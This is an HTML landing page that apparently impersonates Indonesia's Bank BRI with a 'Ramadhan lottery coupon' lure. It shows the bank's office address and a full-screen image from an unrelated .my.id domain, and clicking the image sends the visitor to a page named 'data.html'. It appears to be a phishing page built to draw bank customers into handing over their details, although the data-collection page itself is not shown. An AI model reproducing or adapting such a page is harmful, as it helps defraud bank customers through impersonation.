
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1"> 
    <meta content='#0F78CB' name='theme-color'/>
<!-- Warna untuk Windows Phone -->
    <meta content='#0F78CB' name='msapplication-navbutton-color'/>
    
    <meta property="og:image:type" content="image/jpeg">
   <meta property="og:image" content="https://i.imghippo.com/files/vNVe3160Bnk.jpg">
    <meta property="og:image" content="https://i.imghippo.com/files/vNVe3160Bnk.jpg">
    <meta name="twitter:image" content="https://i.imghippo.com/files/vNVe3160Bnk.jpg">
    <meta name="description" content="Jl. Jenderal Sudirman Kav.44-46, Jakarta">
    <title>𝗞𝘂𝗽𝗼𝗻 𝗨𝗻𝗱𝗶𝗮𝗻 𝙍𝙖𝙢𝙖𝙙𝙝𝙖𝙣 | 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 𝟮𝟬𝟮𝟱</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
    <link rel="stylesheet" href="css/index.css" type="text/css" media="all" />
  </head>
  <style type="text/css" media="all">
      
     
  </style>
  <body>
    <main>
        <img width="100%" height="100%" onclick="location.href='data.html'" src="https://xyz.fvzbza.my.id/img/bg.png" alt="" />
    </main>
  </body>
</html>
